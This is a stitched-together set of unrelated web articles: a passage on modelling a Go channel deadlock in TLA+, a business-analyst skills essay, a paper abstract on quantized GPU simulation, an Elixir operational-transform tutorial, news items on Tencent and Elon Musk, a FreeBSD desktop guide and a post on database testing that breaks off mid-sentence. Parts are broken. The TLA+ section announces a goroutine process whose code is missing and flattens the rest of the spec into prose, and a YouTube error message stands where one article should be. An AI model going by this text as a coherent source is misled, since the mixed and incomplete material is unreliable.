That leaves the channels, which are the most complicated part to specify. There are two kinds of Go channels: buffered and unbuffered. Sends to a buffered channel are blocked if the channel is full. Receives from a buffered channel are blocked if the channel is empty. Both of these are representable with PlusCal macros:

    macro send_buffered(chan) begin
      await channels[chan] < buffered[chan];
      channels[chan] := channels[chan] + 1;
    end macro;

    macro receive_buffered(chan) begin
      await channels[chan] > 0;
      channels[chan] := channels[chan] - 1;
    end macro;

For the purposes of pedagogy I’m not modeling what we actually read or write. This is good practice when writing real-world specs too: write the simplest specification that usefully captures behavior and iteratively add detail to that.

That covers buffered channels. Unbuffered channels, by contrast, always block unless there is both a sender and receiver. In pure TLA+ this wouldn’t be too tricky to specify, but PlusCal assumes each step of the behavior is one process doing one thing. Unbuffered channels can’t be represented natively without adding some annoying bookkeeping, as we need to have one process block “first”. We’ll address that when we get to the spec.

So now that we know a rough approach and what the pain points are likely to be, let’s write the spec.

    ---- MODULE channels ----
    EXTENDS Integers, TLC, Sequences

    CONSTANTS NumRoutines, NumTokens
    Routines == 1 .. NumRoutines

    (* --algorithm channels
    variables
      channels = [tokens |-> 0, found |-> {}];
      buffered = [tokens |-> NumTokens];
      initialized = [w \in Routines |-> FALSE];

channels is the current contents of each channel. For buffered channels, we treat their contents as a single number and store the maximum capacity in a separate buffered variable. For unbuffered channels, we instead store the set of senders waiting for a receiver. initialized is for emulating goroutines.

    macro go(routine) begin
      initialized[routine] := TRUE;
    end macro

An extra macro I added to more closely match the Go syntax.

    macro write_buffered(chan) begin
      await channels[chan] < buffered[chan];
      channels[chan] := channels[chan] + 1;
    end macro;

    macro receive_channel(chan) begin
      if chan \in DOMAIN buffered then
        await channels[chan] > 0;
        channels[chan] := channels[chan] - 1;
      else
        await channels[chan] /= {};
        with w \in channels[chan] do
          channels[chan] := channels[chan] \ {w}
        end with;
      end if;
    end macro;

This is a change from our old receive_buffered because it handles both buffered and unbuffered channels. Buffered channels work as expected. For unbuffered channels, we wait for the set of blocked writers to be nonempty and nondeterministically declare that we read from one of them.

    procedure write_unbuffered(chan) begin
      DeclareSend:
        channels[chan] := channels[chan] \union {self};
      Send:
        await self \notin channels[chan];
        return;
    end procedure

To model unbuffered channels we can either put state on senders or put state on receivers. I opted to place it on the sender because Go permits reading from multiple unbuffered channels at once. In two separate temporal steps we 1) add the process to the set of channel senders and 2) wait to be removed from that set by a receiver.
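If the two-step DeclareSend/Send handshake feels abstract, here is a tiny standalone Go sketch (my code, not from Chris’s post) of the behavior it is modeling: an unbuffered send parks the sender until a matching receive arrives.

    package main

    import (
        "fmt"
        "time"
    )

    func main() {
        found := make(chan string) // unbuffered

        go func() {
            found <- "result" // parks here: the send cannot complete on its own
            fmt.Println("sender: released")
        }()

        time.Sleep(50 * time.Millisecond) // the sender is still parked at this point
        fmt.Println(<-found)              // rendezvous: both sides may now proceed
        time.Sleep(50 * time.Millisecond) // give the sender a moment to print
    }

With that in mind, here is the goroutine process itself: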
First we wait for the goroutine to be initialized, corresponding to line 10. Then we write to the found channel (line 13). If I were trying to be more faithful I would write special defer semantics, but for this I'm happy to just stick it on a label at the end of the process. process main = 0 variables i = 1 ; begin Main: while i <= NumRoutines do write_buffered( "tokens" ); go(i); i := i + 1 ; end while ; Get: while i > 1 do i := i - 1 ; receive_channel( "found" ); end while ; end process ; end algorithm; *) TLA+ doesn't have a native for loop, so we have to emulate it with while. Unlike programming languages, we count 1..N, not 0..(N-1). Our emulation uses one token to initialize each goroutine. Since write_buffered has an await in it, it will block if there are more goroutines than tokens. It will then stay blocked until a goroutine releases a token. The final spec is simply all of these fragments assembled into one module. Now that we have a full spec, we can use the model checker, TLC, to see if it satisfies any properties. We didn't specify any, but TLC will check for deadlocks by default. I'm going to model check it with 3 goroutines and 2 tokens. TLC finds a deadlock, and it's the same issue that Chris had. The goroutines can only return their tokens if there is a receiver on the found channel, the only receiver of that channel is main, main only reads after it initializes all the goroutines, and main will block if there are more goroutines than tokens. The goroutines can't return tokens until all goroutines are initialized, and main can't initialize all goroutines until some goroutines have returned their tokens. Chris suggests three possible ways of fixing this. We can test each of the three by modifying our spec: If the goroutines took the token by sending to limitCh instead of the main for loop doing it, the bug would not exist: process goroutine \in Routines begin A: await initialized[self]; + write_buffered("limitCh"); \* ... while i <= NumRoutines do - write_buffered("limitCh"); initialized[i] := TRUE; i := i + 1; end while; If the goroutines received from limitCh to release their token before sending to found, it wouldn't exist (but because of error handling, it's simpler and more reliable to do the receive in a defer): process goroutine \in Routines begin A: await initialized[self]; + receive_channel("limitCh"); - call write_unbuffered("found"); B: - receive_channel("limitCh"); + call write_unbuffered("found"); end process; And if the entire for loop was in an additional goroutine… This one's a little more complicated. We create a new process for the loop and add its identifier to initialized. I'll use -1 to represent the for loop. initialized = [w \in Routines \union {-1} |-> FALSE]; \* After goroutines process for_loop = -1 variables i = 1 ; begin Loop: while i <= NumRoutines do write_buffered( "limitCh" ); go(i); i := i + 1 ; end while ; end process ; Then we modify main to initialize this instead of doing the loop itself: process main = 0 variables i = NumRoutines; begin Main: go(-1); Get: while i > 0 do i := i - 1 ; receive_channel( "found" ); end while ; end process ; Ultimately we wrote about 75 lines of specification to test 20 lines of Go code. Over half the spec is channel logic which we can now reuse in other specs. Discounting those puts us a little closer, though I'll admit that a real TLA+ spec would be a lot longer because you'd be writing a lot more sanity checking properties.
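For reference, here is a minimal Go sketch of the kind of program the spec models. It is my reconstruction from the spec, not Chris's original code, so the line numbers cited earlier don't refer to it; the limitCh and found channel names and the 3-goroutine, 2-token configuration come from the discussion above, and everything else is an assumption.

```go
package main

func main() {
	const numRoutines = 3 // NumRoutines in the spec
	const numTokens = 2   // NumTokens in the spec

	limitCh := make(chan struct{}, numTokens) // buffered: the "tokens" channel in the spec
	found := make(chan string)                // unbuffered: sends block until someone receives

	for i := 0; i < numRoutines; i++ {
		limitCh <- struct{}{} // main takes a token for each goroutine; blocks once the buffer is full
		go func() {
			defer func() { <-limitCh }() // the token is only released after the send below completes
			found <- "result"            // blocks until main reads from found
		}()
	}

	// main only starts receiving after launching every goroutine, which is
	// exactly the deadlock TLC reports when numRoutines > numTokens.
	for i := 0; i < numRoutines; i++ {
		<-found
	}
}
```

Running this with more goroutines than tokens crashes with Go's built-in deadlock detector ("all goroutines are asleep"), which is the runtime analogue of what TLC reports.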
Nonetheless, writing the TLA+ version wouldn't be significantly more effort than writing the original version and could save you net time if it caught the deadlock before production. Obviously I'm inclined towards using TLA+, given it's my professional language of choice. However, I suspect that TLA+ isn't exactly the right tool for modeling Go channels. That's because there's another formal method, called Spin, which is much closer to Go's native semantics. It even has channels as a native datatype. I've not used Spin, so I can't comment on how effective it truly is, but I imagine it would work very well in this domain. It's also been used before to model the Go runtime scheduler, though that spec was removed when it eventually fell out of sync. You can see a Spin specification of the same problem here. If you're interested in learning more about formal methods, I wrote a book and am running a 3-day TLA+ workshop in October. You can also follow my newsletter where I discuss formal methods techniques and patterns. Thanks to Richard Whaling and Damian Gryski for feedback. I shared the first draft of this essay on my newsletter. If you like my writing, why not subscribe?
1
T-Shaped Skills – How a Versatile BA Can Improve Your Operations
Nowadays, successful business analysis is much more than just requirements management and engineering. Being agile, the ability to overcome conflicts, customer experience focus, and leveraging technological solutions are just a few examples of competencies required by the business. The perception of the Business Analyst role is changing: it's becoming more holistic, and focuses on facilitating outcomes from the general to the specific. However, one thing hasn't changed. Core Business Analyst skills such as problem-solving, analytical thinking, communication, self-organisation and willingness to learn are more crucial than ever. They are the foundation for becoming an effective BA and growing in this role. What's changing is that a broader set of skills may be very beneficial when used well. The answer to those needs is the concept of T-shaped skills as a metaphor to describe a person's abilities [1], represented in two dimensions: This model promotes individuals with broader skillsets: people who are capable of adapting and delivering value in the face of a greater variety of demands. The key advantages of this concept are individualisation and profiles. In the demanding era of digital transformation, I believe there are a few profiles important for the role that are very much connected to the 'many hats' BAs are wearing nowadays. To name some of them: With a growing focus on the discovery and prototyping phases, BAs are expected to help with solution design and the involvement of end users in the process. Focus on customer-centric solutions and end user experience allows for delivering not only an answer to a problem, but a solution that users will use and adapt in their daily routines. Design thinking and an openness to innovation (usually coming from a UX expert) can bring new ideas for solution design. Therefore, these competencies and project roles are very close. Thanks to that fact, people who hold these positions can learn from each other. Keeping up with the latest technology trends is currently one of the most important skills to facilitate better business outcomes. Cloud solutions, low-code platforms (e.g. Mendix, OutSystems), COTS solutions and chatbots are just a few examples of areas where the technology shift is heading. Technology awareness and a high-level understanding of various alternatives greatly helps solve business problems and find opportunities. Some BAs are proficient with these technologies (as former developers or quality engineers), which can be very beneficial for their growth in this role. It has become a natural path to start a Business Analyst career as a Product Owner. Very often in the projects, BAs work very closely with POs. Product Ownership or Product Management is not about how decisions are made, but about the constant focus on maximising the value of the products, the same as in analysis. Therefore, the BA is a strategic role responsible for representing the interests of the customer in front of the development team. The second role that works hand in hand with the Business Analyst is the Project Manager. Understanding project metrics, deliverables, and budgets allows for making better decisions when it comes to delivery. The responsibilities of a Business Analyst very frequently overlap with the ones of a Consultant. The role of a Consultant is often a career path for an experienced Business Analyst.
Customer awareness, business strategy and readiness, big picture thinking and cost-benefit analysis are skills that every Business Analyst will use in a large-scale project. In the Objectivity BA Practice, we emphasise the development of the fundamental skills for the BA role, but at the same time, we create a culture that encourages continuous learning and an open mindset. It supports the development of individuals with T-shaped skillsets, which is beneficial for all sides: the company, our clients, and our employees. A Business Analyst with a T-shaped skillset can help an organisation to: And, at the same time, for the Business Analyst as an individual, the T-shaped skills: Specialisation is extremely important, as without deep knowledge in a professional area, we can't build trust and effectiveness. On the other hand, as BAs, we have various backgrounds (technical or non-technical) and skills. A Business Analyst who utilises all their skills will be better equipped for the challenges the role can face during digital transformation. BAs with T-shaped skills can be much more than bridges between IT and business: they can be the people who are capable of bringing greater value inside the team as well as to the organisation. [1] The earliest popular reference to the model was published by David Guest in 1991; it was later used by Tim Brown, CEO of IDEO.
49
QuanTaichi: A Compiler for Quantized (“Low-Precision”) Simulations on the GPU
QuanTaichi: A Compiler for Quantized Simulations Yuanming Hu , Jiafeng Liu , Xuanda Yang , Mingkuan Xu , Ye Kuang , Weiwei Xu , Qiang Dai , William T. Freeman , Fredo Durand February 2021 Abstract High-resolution simulations can deliver great visual quality, but they are often limited by available memory, especially on GPUs. We present a compiler for physical simulation that can achieve both high performance and significantly reduced memory costs, by enabling flexible and aggressive quantization. Low-precision (“quantized”) numerical data types are used and packed to represent simulation states, leading to reduced memory space and bandwidth consumption. Quantized simulation allows higher resolution simulation with less memory, which is especially attractive on GPUs. Implementing a quantized simulator that has high performance and packs the data tightly for aggressive storage reduction would be extremely labor-intensive using traditional programming languages. To make the creation of quantized simulation practical, we have developed a new set of language abstractions and a compilation system. A suite of tailored domain-specific optimizations ensure quantized simulators often run as fast as the full-precision simulators, despite the overhead of encoding-decoding the packed quantized data types. Our programming language and compiler, based on Taichi, allow developers to effortlessly switch between different full-precision and quantized simulators, to explore the full design space of quantization schemes, and ultimately to achieve a good balance between space and precision. The creation of quantized simulation with our system has large benefits in terms of memory consumption and performance. For example, on a single GPU, we can simulate a Game of Life with 20 billion cells (8× compression per pixel), an Eulerian fluid system with 421 million active voxels (1.6× compression per voxel), and a hybrid Eulerian-Lagrangian elastic object simulation with 235 million particles (1.7× compression per particle). At the same time, quantized simulations create physically plausible results. Our quantization techniques are complementary to existing acceleration approaches of physical simulation: they can be used in combination with these existing approaches, such as sparse data structures, for even higher scalability and performance. Type Conference paper Publication SIGGRAPH 2021 More info: Supplemental document
5
Delta (OT) for Elixir
Today, we at Slab are excited to open-source our Elixir implementation of Delta – an expressive format to describe contents and changes. Deltas are what power Slab's real-time collaborative editor, as well as the core data layer behind Quill, the popular rich-text editor for JavaScript. Deltas can describe any rich text document, including all text and formatting information, but without the ambiguity and complexity of HTML. When we set out to build a knowledge-base that teams would love to use, we knew that real-time collaboration had to be a key part of it. The Delta format in JavaScript was already a part of building and open-sourcing Quill, complete with support for Operational Transform (OT). So it seemed appropriate to use Quill and Delta for Slab too. We needed an Elixir implementation on the server as well which would accept the document diffs from the clients running in the browser, perform concurrency control and conflict resolution as part of synchronization, and update the document on the server and on clients in real-time. The core functionality of Delta is to track a document's contents and how it changes. Take the following document with the text "Gandalf the Grey" with "Gandalf" bolded and "Grey" in grey: alias Delta . Op gandalf = [ Op . insert ( "Gandalf" , % { "bold" => true } ) , Op . insert ( " the " ) , Op . insert ( "Grey" , % { "color" => "#ccc" } ) , ] We can define a new change (intended to be applied to above), that keeps the first 12 characters, deletes the next 4, and inserts "White" text in white: death = [ Op . retain ( 12 ) , Op . delete ( 4 ) , Op . insert ( "White" , % { "color" => "#fff" } ) , ] Applying this change on our document results in: Delta . compose (gandalf, death) Here's a quick rundown of the features supported by Delta: The Delta format tracks the contents of documents, their formatting, attributes and changes over-time concisely and without ambiguity, allowing you to have a consistent data representation across different platforms. Delta implements the OT algorithm including compose, transform and invert. This is especially useful when building collaboration functionalities with concurrency and conflict-resolution. Delta supports generalized formatting with arbitrary attributes over a range of text. How they behave is up to you. Other than formatting, they can be used for tracking changes (including author or time), comments, annotations and references. Op . insert ( "Slab <3 Elixir" , % { "comment_thread_id" => 123 } ) Delta has built-in support for simple embeds (e.g. image/video from a link), but is also configurable and extendable with custom handlers for more complex embed needs. This allows defining custom logic for composing and transforming the content inside embeds. Op . insert ( % { "image" => "https://app.com/logo.png" } , % { "alt" => "App Logo" } ) A real-life example would be utilizing the OTP features in Elixir to create a Document server which clients could connect to and perform updates to a document, fetch older versions, or undo operations. Here's how you can write a simple implementation in Elixir that supports these features: Let's start by writing a simple GenServer that represents a document and can return its contents: defmodule Document do use GenServer @initial_state % { contents: [ ] } def start_link, do: GenServer . start_link (__MODULE__, :ok ) def get_contents (pid) , do: GenServer . 
call (pid, :get_contents ) @impl true def init ( :ok ) , do: { :ok , @initial_state } @impl true def handle_call ( :get_contents , _from, state) do { :reply , state.contents, state} end end Clients can now create and connect to our Document processes, fetching the contents (although they'll always be empty for now): { :ok , pid} = Document . start_link ( ) Document . get_contents (pid) Next, we'll add support for updating the document. The Document server should be able to accept changes or diffs, apply them, and return the up-to-date contents. We'll add a new update(pid, change) method and a corresponding callback: defmodule Document do def update (pid, change) , do: GenServer . call (pid, { :update , change} ) @impl true def handle_call ( { :update , change} , _from, state) do contents = Delta . compose (state.contents, change) state = % { contents: contents} { :reply , contents, state} end end Now clients can make changes to the document: Document . get_contents (pid) Document . update (pid, [ Op . insert ( "Hello!" ) ] ) Document . update (pid, [ Op . retain ( 5 ) , Op . insert ( " world" ) ] ) It will be really helpful if clients can undo the last change quickly. While we can certainly keep track of all changes performed on the document, a better strategy would be to keep track of the "inverted" changes. For every change to a document, there exists an inverted version which cancels the effect of that change. Simply applying this inverted change will return the document contents prior to the change. Delta supports this through the invert method: base = [ Op . insert ( "Jon: King in the North" ) ] change = [ Op . retain ( 5 ) , Op . delete ( 7 ) , Op . insert ( "Warden of" ) ] inverted = Delta . invert (change, base) updated = Delta . compose (base, change) Delta . compose (updated, inverted) We can use this to implement the "undo" functionality. We'll update our state map to include an inverted_changes key and while we're at it let's also include a version integer to track how many changes have been performed on the document so far. Next, we'll modify our :update callback to push the inverted change in the list. defmodule Document do @initial_state % { version: 0 , contents: [ ] , inverted_changes: [ ] , } @impl true def handle_call ( { :update , change} , _from, state) do inverted = Delta . invert (change, state.contents) state = % { version: state.version + 1 , contents: Delta . compose (state.contents, change) , inverted_changes: [inverted | state.inverted_changes] , } { :reply , state.contents, state} end end Finally, we'll add an undo(pid) method and a corresponding callback that simply reverts the last change. defmodule Document do def undo (pid) , do: GenServer . call (pid, :undo ) @impl true def handle_call ( :undo , _from, % { version: 0 } = state) do { :reply , state.contents, state} end @impl true def handle_call ( :undo , _from, state) do [last_change | changes] = state.inverted_changes state = % { version: state.version - 1 , contents: Delta . compose (state.contents, last_change) , inverted_changes: changes, } { :reply , state.contents, state} end end Note that the first :undo function clause handles documents with no changes, in which case it doesn't do anything. Let's try it out in IEx: { :ok , pid} = Document .start_link Document . update (pid, [ Op . insert ( "Hello world!" ) ] ) Document . update (pid, [ Op . retain ( 6 ) , Op . delete ( 5 ) , Op . insert ( " Elixir" ) ] ) Document . undo (pid) Document . 
undo (pid) We want to allow clients to observe how a document changed over time. Like our undo functionality, one way would be to keep track of all changes and "replay" them on an empty document one-by-one to achieve our desired result, but since we're already tracking inverted changes, we can instead start from the current state of the document and revert the changes until we get to our document's initial state. Again, we'll add a public get_history(pid) method and a corresponding callback that implements its functionality: defmodule Document do def get_history (pid) , do: GenServer . call (pid, :get_history ) @impl true def handle_call ( :get_history , _from, state) do current = {state.version, state.contents} history = Enum . scan (state.inverted_changes, current, fn inverted, {version, contents} -> contents = Delta . compose (contents, inverted) {version - 1 , contents} end ) { :reply , [current | history] , state} end end Here we use Enum.scan/3 to compose each inverted change in the reverse order, until we get to the beginning, finally returning a list of document versions and contents at each point. Trying it out: Document . update (pid, [ Op . insert ( "Slab <3 Ruby" ) ] ) Document . update (pid, [ Op . retain ( 8 ) , Op . delete ( 4 ) , Op . insert ( "Elixir" ) ] ) Document . update (pid, [ Op . retain ( 8 ) , Op . retain ( 6 , % { "italic" => true } ) ] ) Document . get_history (pid) Similarly, we might want to allow clients to view the diff between two versions of the document in any order. In this case, it might be useful to store both changes and the inverted_changes so we can start from any point in the document's history and quickly go both forward and backward. Continuing from our current implementation, this would not be much harder and so, this exercise is left for our readers. Combining all of the above, the final code for our Document server looks like this: defmodule Document do use GenServer @initial_state % { version: 0 , contents: [ ] , inverted_changes: [ ] , } def start_link, do: GenServer . start_link (__MODULE__, :ok ) def stop (pid) , do: GenServer . stop (pid) def update (pid, change) , do: GenServer . call (pid, { :update , change} ) def get_contents (pid) , do: GenServer . call (pid, :get_contents ) def get_history (pid) , do: GenServer . call (pid, :get_history ) def undo (pid) , do: GenServer . call (pid, :undo ) @impl true def init ( :ok ) , do: { :ok , @initial_state } @impl true def handle_call ( { :update , change} , _from, state) do inverted = Delta . invert (change, state.contents) state = % { version: state.version + 1 , contents: Delta . compose (state.contents, change) , inverted_changes: [inverted | state.inverted_changes] , } { :reply , state.contents, state} end @impl true def handle_call ( :get_contents , _from, state) do { :reply , state.contents, state} end @impl true def handle_call ( :get_history , _from, state) do current = {state.version, state.contents} history = Enum . scan (state.inverted_changes, current, fn inverted, {version, contents} -> contents = Delta . compose (contents, inverted) {version - 1 , contents} end ) { :reply , [current | history] , state} end @impl true def handle_call ( :undo , _from, % { version: 0 } = state) do { :reply , state.contents, state} end @impl true def handle_call ( :undo , _from, state) do [last_change | changes] = state.inverted_changes state = % { version: state.version - 1 , contents: Delta . 
compose (state.contents, last_change) , inverted_changes: changes, } { :reply , state.contents, state} end end Here's a quick recap of all the features supported by our GenServer and how they work. Clients can create new documents or make changes to existing ones by interacting with our API: { :ok , pid} = Document .start_link Document . update (pid, [ Op . insert ( "Hello!" ) ] ) Document . update (pid, [ Op . retain ( 5 ) , Op . insert ( " world" ) ] ) Document . update (pid, [ Op . retain ( 6 ) , Op . delete ( 5 ) , Op . insert ( "Elixir" , % { "color" => "purple" } ) ] ) Document . get_history (pid) Document . undo (pid) Document . get_history (pid) Elixir is the modern technology of choice today in building scalable and concurrent real-time applications. Phoenix in 2015 made waves in supporting 2 million simultaneous clients. With the release of Delta, we hope to help address the difficult real-world challenge of conflict resolution, in order to enable highly collaborative real-time experiences. Running reliably in production at Slab for almost 4 years now, we're confident in sharing a core piece of our technology with the Elixir community, and excited to see what applications and experiences you build from it. We'd love to hear your comments, feedback and if there's anything else about Elixir or OTP you would like to learn more about.
11
Tencent tanks 10% after Chinese media calls online gaming ‘opium’
Shares of Tencent and NetEase plunged on Tuesday after Chinese state media branded online gaming "opium." The article also called for further restrictions on the industry in order to prevent addiction and other negative impacts on children. The article, by Economic Information Daily, a Chinese state-run publication, said online gaming addiction among children is "widespread" and could negatively impact their growth. It was deleted a few hours after publication. A logo of Tencent is seen during the World Internet Conference (WIC) in Wuzhen, Zhejiang province, China, November 23, 2020. Aly Song | Reuters GUANGZHOU, China — Shares of Tencent and NetEase plunged on Tuesday after Chinese state media branded online gaming "opium" and likened it to a drug. The article also called for further restrictions on the industry in order to prevent addiction and other negative impacts on children. The article was deleted a few hours after publication but has since been re-published with a new headline and references to "opium" removed. Tencent shares closed around 6% lower, while NetEase closed down almost 8% in Hong Kong, with both companies clawing back some earlier losses. Tencent is one of the world's largest gaming companies, responsible for high-profile games like "Honor of Kings." NetEase declined to comment. Tencent was not immediately available for comment. The article, by Economic Information Daily, a Chinese state-run publication that's affiliated to the official Xinhua newspaper, said that online gaming addiction among children is "widespread" and could negatively impact their growth. The article said that in 2020, more than half of China's children were nearsighted and online games affect their education. The sentiment in the article is not that new. For a long time, the Chinese government has been concerned about the impact of video games on minors. In 2018, Beijing froze new game approvals over concerns that gaming was impacting youngsters' eyesight. In China, online games require approvals from the regulators. In 2019, China brought in rules that banned those under 18 years from playing online games between 10 p.m. and 8 a.m. and restricted the amount of time they could play. "The article brought attention to gaming addiction among minors. It is reminiscent of older articles where video games were compared to digital heroin," said Daniel Ahmad, senior analyst at Niko Partners. "The timing of the article has raised concern among investors given the recent crackdown on tech companies and the education/tutoring sector." The article also called for more control over the amount of time children spend playing games and for reviewing the content of games more stringently to reduce the amount of "improper" information shown to minors. "For the next step, there should be stricter controls over the amount of time minors play online games. It should be reduced by large amount from current level," the article said, according to a CNBC translation. Both NetEase and Tencent have introduced measures to protect young players, including real-name registrations to play games. Last month, Tencent introduced a facial recognition feature on smartphones to verify that the gamer is an adult.
But after the publication of the article on Tuesday, Tencent announced further gaming restrictions. It will reduce the amount of time those under 18 years old can play the company's games on non-holiday days from 90 minutes to one hour, and on holidays from 3 hours to 2 hours. Tencent will also bar children under 12 years old from spending money in the game. The gaming giant said it will also crack down on identity fraud to find minors who are using adults' accounts to play games. These new measures will begin with Tencent's "Honor of Kings" game and eventually roll out to other titles. Tencent also called for the whole industry to discuss the feasibility of banning gaming for children under 12. Ahmad noted that most revenue in China is generated by players who are 18 years old and above. "If more measures come into place to prevent youth addiction to gaming, it won't stop revenue generating gamers from playing," Ahmad said.
5
Elon Musk suggests Bitcoin is ‘ghost money’
Elon Musk has responded to a request for cryptocurrency investment advice by suggesting that bitcoin is ghost money. The SpaceX and Tesla CEO, who became the world's third richest person this week, made the claim amid a surge in the price of bitcoin that could see it surpass its record high from 2017. Bitcoin is currently trading at around $17,400 (£13,000) – less than $3,000 off its all-time high – having fallen to below $5,000 earlier this year. The surge in value has attracted renewed interest in the cryptocurrency, with Game of Thrones star Maisie Williams tweeting a poll on Monday asking: "Should I go long on bitcoin?" More than 800,000 people voted 'no', but thousands of people replied with various memes encouraging her to invest. Mr Musk replied with a reference to a song from The Witcher series, stating, "Toss a bitcoin to ur Witcher." Another Twitter user responded with one of the earliest bitcoin memes, which features a picture of a wizard with the text "Magic internet money/ Join us". Mr Musk continued the thread with a cryptic message of a ghost emoji and a stack of dollar bills emoji. He also linked to an article from the satirical news site The Onion, featuring the term "ghost money". The article is from 2017 and was published just before bitcoin experienced its record-breaking price surge. It stated: "At press time, bitcoin had recouped some of its losses, which experts attributed to the fact that even ghost money best suited for anonymously buying heroin could sometimes rebound." His mention of cryptocurrency once again attracted scammers, who attempted to extort cryptocurrency from his followers by imitating his username and profile picture and calling for people to send bitcoin to an anonymous address. Analysis by The Independent in 2018 found that more than 400 people sent thousands of dollars worth of cryptocurrency to scammers in hopes of receiving more money back. Earlier this year, Mr Musk claimed that the issue had reached "new levels" on Twitter and called on CEO Jack Dorsey to take further action. "This is not cool," he tweeted. "Troll/ bot networks on Twitter are a dire problem for adversely affecting public discourse and ripping people off." Twitter said at the time that it has rules in place forbidding such activity and claimed it was "constantly adapting to bad actors' evolving methods" in order to prevent scams on its platform.
1
Azure Cost Management API Avec PowerShell Et Universal Dashboard (French)
Your browser isn’t supported anymore. Update it to get the best YouTube experience and our latest features. Learn more
1
FreeBSD 13.0: Full Desktop Experience
With the release of FreeBSD 13.0 on the horizon, I wanted to see how it shapes up on my Lenovo T450 laptop.  Previous major releases on this laptop, using it as a workstation, felt very rough around the edges but with 13, it feels like the developers got it right. I like to keep things simple when it comes to a desktop operating system so the description below is how I went from a fresh install of FreeBSD 13.0RC1 to a working environment that is based on using the XFCE4 desktop experience. The FreeBSD install process is simple and well documented in other official locations, so I am not going to repeat that here.  However, some of the configuration items that I did select was to use ZFS on Root, encrypted swap and disabled all services (this is a workstation, not a server). Once the machine had been rebooted, we need to set it up so that suspend/resume works correctly (and tests as such) and enable power management.  The main issue that people have getting the resume part of the suspend/resume to work is not having the drm or xf86 drivers loaded that are applicable to the onboard graphics. For the T450 here, we have a standard Intel graphics chipset.  Install the following binary packages for the i915 drivers, enable them and the power management services, then reboot your machine for testing: Once the machine has rebooted, you can test to see if your laptop can go into a suspend state and then resume without issue: This will send the laptop into the S3 suspend state. Wait 30 seconds and then briefly press the power button. If all is working correctly, your laptop should come back to life including the screen.  This has been ‘hit and miss’ on the T450 in previous versions but seems to be working ok on 13.0. Just a note, if you do experience some issues here, make sure your bios/firmware has been updated to the latest release. If the above worked ok, then you can set the sysctl parameter to suspend on lid closure: Also set it in the sysctl.conf file so it is set correctly each boot: The final thing to do is load up xorg, XFCE4 and a few of our favourite apps to get us going. Once all the packages have been installed, enable dbus, slim and openntpd then start the services (except slim, reboot when you are ready to start XFCE4): At some point, I’ll change to the OpenBSD ksh shell (oksh in FreeBSD packages) so I’ll add an entry into the ~/.profile file to read in ~/.kshrc And the skeleton of my ~/.kshrc file will look something like the following: Log out and log back in to ingest the above environment variables (or wait for the reboot below). The final part is to get a vanilla XFCE4 desktop setup and enable/disable some of the default settings so the desktop works efficiently with the suspend/resume function and change the screensaver/lock screen. Setup the slim display manager.  Edit the /usr/local/etc/slim.conf and change the default theme to slim-freebsd-black-theme: Set XFCE4 to auto-start after login, create the ~/.xinitrc file and then insert the lines: Restart the laptop for the DM to take affect (this will also allow reboot and shutdown directly from within XFCE4 for users): Login and once at the XFCE4 desktop, go to Applications -> Settings -> Settings Manager In settings, scroll down to System and select ‘Session and Startup’ Select ‘Application Autostart’, de-select XFCE Screensaver, select both Screensaver and AP-SPI D-Bus Bus. 
Once the above is done, log out of XFCE4 and log back in, then you can configure the xscreensaver program as well as being able to suspend and resume your laptop by closing and opening the lid at any point in the use of the laptop.
86
The argument against clearing the database between tests (2020)
Some reasons why you might not want to remove data from the database between automated tests: speed, correctness, data growth issues and parallelism advantages I'm of the school of thought that most useful "unit" tests should involve the database. Consequently I don't mock out, fake or stub the database in tests that I write. On every project, I had a small piece of test harness code that cleans the database between tests : @before_test def clean_session : for table in all_tables (): db . session . execute ( "truncate %s ;" % table . name ) db . session . commit () return db . session The reason for this was that it seemed obvious that each test should start with a completely clean slate in order to make it a fair test. All other data should be deleted so that nothing from other tests that can get conflated and cause the test to go wrong somehow - either spuriously passing or failing. Recently I've come to the conclusion that it can (but not always) make sense to run the tests with a dirty database - not only not cleaning between individual tests but also not cleaning between whole test runs - and keeping all the old test data around on a (near) permanent basis. Upturning the base assumption that "the database is clean" in a test requires a small adjustment to your mindset. You can't write tests that assume that data it has created is the only thing present, such as this one: def test_adding_a_user (): db_session . add ( user ) # won't work, assumes the only user is the one added above assert db_session . query ( User ) . count () == 1 Instead each test needs to be written to assert only on the basis of data it has created (or has not created). It should handle data created by others. A corrected example: def test_adding_a_user_2 ( session ): user = make_user () db_session . add ( user ) # this is safe, doesn't assume no other users exist assert db_session . query ( User ) . get ( user . user_id ) is not None This isn't an easy change to make in existing tests. The assumption of clean data is tricky to refactor away. There are reasons to consider it though. Tearing down data between tests or schemas between test runs is not free of (computational) charge. The time taken to clean the database is usually proportional to the number of tables and while this cost is small to begin with it can grow over time . When you have a large number of tests this per-test overhead becomes a problem. My personal experience is that the problem starts to get serious when you have around one hundred tests. For the typical test suite tearing down data can take anywhere from one to ten percent of total runtime, depending on how efficiently it's done. There are ways to be quicker, here are a few: That all aside, the fact remains that tearing down the database is never as fast as not tearing it down. One perennial problem with code that uses data is that when the volume of data grows the performance can change considerably: when there are just three rows in a table a logarithmic time operation (fast) is indistinguishable from a polynomial time operation (slow) . It's a sad fact that the majority of tests and indeed most development time is spent with the database in an empty or nearly-empty state. As a result there is a loss of feedback. Without the daily experience of running with realistic data sets, detecting a slow data access pattern requires thoughtful analysis and/or experience. 
When your tests don't clean the database your test database will slowly fill with data which is, although not a complete match with the shape of production, presumably along similar lines. Sometimes you will notice problem queries before finding out in production and without doing analysis. Better yet, when your tests don't assume they're starting from a clean sheet, you can run your tests with a dump from production loaded into your database. This can help confirm that data access patterns you're using will work when the database, as a whole, is at production size. Testing-by-example (as opposed to property-based testing) is based on the programmer coming up with examples of inputs and asserting that when given those inputs the program produces the right outputs - or at least - the right sort of outputs. There is also the implicit assertion (present in all automated tests) that the program does not raise an exception or crash. Hopefully, at least some of the residual data your tests leave behind is highly contrived and contains lots of "bad" data and error cases. For example: users that have started the order process but who haven't gotten as far as entering their email address, users who have been marked as duplicates, users whose names contain semi-colons and so on. Running your tests in the presence of all this realistic wonky data can help tease out real bugs. If one of your tests inserts customer names based on the Big List of Naughty Strings then you might find more bugs in other areas when other tests exercise different parts of the same system. Of course - you shouldn't rely on such "atmospheric" bad data as an aid to correctness. Each time you find a new bug based on bad data left lying around from another test or loaded in from production a new, specific, test should be added for that condition. However having a load of crap data loaded can help uncover issues that might not otherwise have been uncovered at the development stage. Test parallelism is often discussed but my experience is that relatively few projects ever implement it, even though quite a few would benefit. The problem is as follows. At first your tests are fast because there aren't many of them and so most teams put off parallel tests until "later". When "later" arrives, the build is now slow and test parallelism would help but it's usually not easy to adapt existing serial tests to run in parallel. This is because tests typically manipulate state in odd ways and if each test assumes they are the only process 